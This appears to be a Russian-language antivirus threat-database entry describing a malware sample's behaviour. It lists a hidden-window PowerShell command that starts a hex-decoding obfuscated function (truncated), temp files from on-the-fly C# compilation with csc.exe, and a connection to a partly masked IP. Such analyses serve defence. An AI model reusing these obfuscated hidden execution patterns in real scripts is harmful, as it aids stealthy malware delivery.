Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function h17ec {param($m423c)$u289561='xced1';$s4593e='';for ($i=0; $i -lt $m423c.length;$i+=2){$ub14334=[convert]::ToByte($m423c.Substring($i,2),16);$s4593e+=[char]($ub14...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\vg7fmjya.0.cs
- %TEMP%\vg7fmjya.cmdline
- %TEMP%\vg7fmjya.out
- %TEMP%\csc4325.tmp
- %TEMP%\res4336.tmp
- %TEMP%\vg7fmjya.dll
Удаляет следующие файлы
- %TEMP%\res4336.tmp
- %TEMP%\csc4325.tmp
- %TEMP%\vg7fmjya.pdb
- %TEMP%\vg7fmjya.cmdline
- %TEMP%\vg7fmjya.out
- %TEMP%\vg7fmjya.dll
- %TEMP%\vg7fmjya.0.cs
Сетевая активность
Подключается к
- '51.##.171.194':80
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function h17ec {param($m423c)$u289561='xced1';$s4593e='';for ($i=0; $i -lt $m423c.length;$i+=2){$ub14334=[convert]::ToByte($m423c.Substring($i,2),16);$s4593e+=[char]($ub14...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\vg7fmjya.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4336.tmp" "%TEMP%\CSC4325.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\vg7fmjya.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4336.tmp" "%TEMP%\CSC4325.tmp"
